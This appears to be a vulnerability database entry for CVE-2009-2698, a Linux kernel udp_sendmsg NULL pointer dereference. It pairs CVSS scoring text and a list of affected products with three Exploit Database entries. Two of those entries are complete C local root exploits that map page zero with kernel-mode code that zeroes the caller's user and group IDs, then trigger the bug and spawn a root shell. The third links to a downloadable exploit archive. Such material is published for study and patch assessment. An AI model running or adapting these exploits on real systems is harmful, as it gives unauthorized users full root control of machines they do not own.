Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-476 |
NULL Pointer Dereference The product dereferences a pointer that it expects to be valid but is NULL. |
|
Metrics
Metric |
Score |
Severity |
CVSS Vector |
Source |
V3.1 |
7.8 |
HIGH |
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack VectorThis metric reflects the context by which vulnerability exploitation is possible. The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Attack ComplexityThis metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges RequiredThis metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker requires privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources. User InteractionThis metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. ScopeFormally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality ImpactThis metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity ImpactThis metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability ImpactThis metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
|
[email protected] |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 9575
Publication date : 2009-09-01 22:00 +00:00
Author : Andi
EDB Verified : Yes
/***********************************************************
* hoagie_udp_sendmsg.c
* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698
*
* udp_sendmsg bug exploit via (*output) callback function
* used in dst_entry / rtable
*
* Bug reported by Tavis Ormandy and Julien Tinnes
* of the Google Security Team
*
* Tested with Debian Etch (r0)
*
* $ cat /etc/debian_version
* 4.0
* $ uname -a
* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
* $ ./hoagie_udp_sendmsg
* hoagie_udp_sendmsg.c - linux root < 2.6.19 local
* -andi / void.at
*
* sh-3.1# id
* uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
* sh-3.1#
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
*
[email protected]
* http://www.void.at
*
************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>
/**
* this code will be called from NF_HOOK via (*output) callback in kernel mode
*/
void set_current_task_uids_gids_to_zero() {
asm("push %eax\n"
"movl $0xffffe000, %eax\n"
"andl %esp, %eax\n"
"movl (%eax), %eax\n"
"movl $0x0, 0x150(%eax)\n"
"movl $0x0, 0x154(%eax)\n"
"movl $0x0, 0x158(%eax)\n"
"movl $0x0, 0x15a(%eax)\n"
"movl $0x0, 0x160(%eax)\n"
"movl $0x0, 0x164(%eax)\n"
"movl $0x0, 0x168(%eax)\n"
"movl $0x0, 0x16a(%eax)\n"
"pop %eax\n");
}
int main(int argc, char **argv) {
int s;
struct msghdr header;
struct sockaddr_in sin;
char *rtable = NULL;
fprintf(stderr,
"hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n"
"-andi / void.at\n\n");
s = socket(PF_INET, SOCK_DGRAM, 0);
if (s == -1) {
fprintf(stderr, "[*] can't create socket\n");
exit(-1);
}
/**
* initialize required variables
*/
memset(&header, 0, sizeof(struct msghdr));
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("127.0.0.1");
sin.sin_port = htons(22);
header.msg_name = &sin;
header.msg_namelen = sizeof(sin);
/**
* and this is the trick:
* we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as a callback (=> offset 0x74)
* so we map our rtable buffer at offset 0 and set output callback function
*
* struct dst_entry
* {
* struct dst_entry *next;
* atomic_t __refcnt; client references
* int __use;
* struct dst_entry *child;
* struct net_device *dev;
* short error;
* short obsolete;
* int flags;
* #define DST_HOST 1
* #define DST_NOXFRM 2
* #define DST_NOPOLICY 4
* #define DST_NOHASH 8
* #define DST_BALANCED 0x10
* unsigned long lastuse;
* unsigned long expires;
*
* unsigned short header_len; * more space at head required *
* unsigned short trailer_len; * space to reserve at tail *
*
* u32 metrics[RTAX_MAX];
* struct dst_entry *path;
*
* unsigned long rate_last; * rate limiting for ICMP *
* unsigned long rate_tokens;
*
* struct neighbour *neighbour;
* struct hh_cache *hh;
* struct xfrm_state *xfrm;
*
* int (*input)(struct sk_buff*);
* int (*output)(struct sk_buff*);
*
* #ifdef CONFIG_NET_CLS_ROUTE
* __u32 tclassid;
* #endif
*
* struct dst_ops *ops;
* struct rcu_head rcu_head;
*
* char info[0];
* };
*
* struct rtable
* {
* union
* {
* struct dst_entry dst;
* struct rtable *rt_next;
* } u;
*
* struct in_device *idev;
*
* unsigned rt_flags;
* __u16 rt_type;
* __u16 rt_multipath_alg;
*
* __be32 rt_dst; * Path destination *
* __be32 rt_src; * Path source *
* int rt_iif;
*
* * Info on neighbour *
* __be32 rt_gateway;
*
* * Cache lookup keys *
* struct flowi fl;
*
* * Miscellaneous cached information *
* __be32 rt_spec_dst; * RFC1122 specific destination *
* struct inet_peer *peer; * long-living peer info *
* };
*
*/
rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (rtable == MAP_FAILED) {
fprintf(stderr, "[*] mmap failed\n");
exit(-1);
}
*(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;
/* trigger exploit
*
* the second sendmsg() call will call ip_append_data() with rt == NULL
* because of:
* if (up->pending) {
* *
* * There are pending frames.
* * The socket lock must be held while it's corked.
* *
* lock_sock(sk);
* if (likely(up->pending)) {
* if (unlikely(up->pending != AF_INET)) {
* release_sock(sk);
* return -EINVAL;
* }
* goto do_append_data;
* }
* release_sock(sk);
* }
*
*/
sendmsg(s, &header, MSG_MORE|MSG_PROXY);
sendmsg(s, &header, 0);
close(s);
system("/bin/sh");
return 0;
}
// milw0rm.com [2009-09-02]
Exploit Database EDB-ID : 9574
Publication date : 2009-09-01 22:00 +00:00
Author : spender
EDB Verified : Yes
/* second verse, same as the first
CVE-2009-2698 udp_sendmsg(), x86/x64
Cheers to Julien/Tavis for the bug, p0c73n1 for just throwing code at
NULL and finding it executed
This exploit is a bit more nuanced and thoughtful ;)
use ./therebel.sh for everything
At this moment, when each of us must fit an arrow to his bow and
enter the lists anew, to reconquer, within history and in spite of it,
that which he owns already, the thin yield of his fields, the brief
love of the earth, at this moment when at last a man is born, it is
time to forsake our age and its adolescent furies. The bow bends;
the wood complains. At the moment of supreme tension, there will
leap into flight an unswerving arrow, a shaft that is inflexible and
free. -Camus
*/
main: http://grsecurity.net/~spender/therebel.tgz
back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9574.tgz (2009-therebel.tgz)
# milw0rm.com [2009-09-02]
Exploit Database EDB-ID : 9542
Publication date : 2009-08-30 22:00 +00:00
Author : INetCop Security
EDB Verified : Yes
/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>
unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
unsigned *addr=task;
while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
addr++;
}
addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
return;
}
void exploit();
void kernel_code()
{
asm("exploit:\n"
"push %eax\n"
"movl $0xfffff000,%eax\n"
"andl %esp,%eax\n"
"pushl (%eax)\n"
"call get_root_uid\n"
"addl $4,%esp\n"
"popl %eax\n");
return;
}
void *kernel=kernel_code;
int main(int argc, char **argv)
{
int fd=0;
char buf[1024];
struct sockaddr x0x;
void *zero_page;
uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}
if(personality(0xffffffff)==PER_SVR4){
if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
perror("[-] mprotect()");
return -1;
}
}
else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
perror("[-] mmap()");
return -1;
}
*(unsigned long *)0x0=0x90909090;
*(char *)0x00000004=0x90; /* +1 */
*(char *)0x00000005=0xff;
*(char *)0x00000006=0x25;
*(unsigned long *)0x00000007=(unsigned long)&kernel;
*(char *)0x0000000b=0xc3;
if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
perror("[-] socket()");
return -1;
}
x0x.sa_family=AF_UNSPEC;
memset(x0x.sa_data,0x82,14);
memset((char *)buf,0,sizeof(buf));
sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
if(getuid()==uid){
printf("[-] exploit failed, try again\n");
return -1;
}
close(fd);
execl("/bin/sh","sh","-i",NULL);
return 0;
}
/* eoc */
// milw0rm.com [2009-08-31]
Products Mentioned
Configuraton 0
Linux>>Linux_kernel >> Version To (excluding) 2.6.19
Configuraton 0
Canonical>>Ubuntu_linux >> Version 6.06
Canonical>>Ubuntu_linux >> Version 8.04
Canonical>>Ubuntu_linux >> Version 8.10
Canonical>>Ubuntu_linux >> Version 9.04
Configuraton 0
Suse>>Linux_enterprise_desktop >> Version 10
Suse>>Linux_enterprise_server >> Version 9
Suse>>Linux_enterprise_server >> Version 10
Configuraton 0
Fedoraproject>>Fedora >> Version 10
Configuraton 0
Redhat>>Enterprise_linux_desktop >> Version 4.0
Redhat>>Enterprise_linux_desktop >> Version 5.0
Redhat>>Enterprise_linux_eus >> Version 4.8
Redhat>>Enterprise_linux_eus >> Version 5.3
Redhat>>Enterprise_linux_server >> Version 4.0
Redhat>>Enterprise_linux_server >> Version 5.0
Redhat>>Enterprise_linux_server_aus >> Version 5.3
Redhat>>Enterprise_linux_workstation >> Version 4.0
Redhat>>Enterprise_linux_workstation >> Version 5.0
Configuraton 0
Vmware>>Vcenter_server >> Version 4.0
Vmware>>Esxi >> Version 4.0
References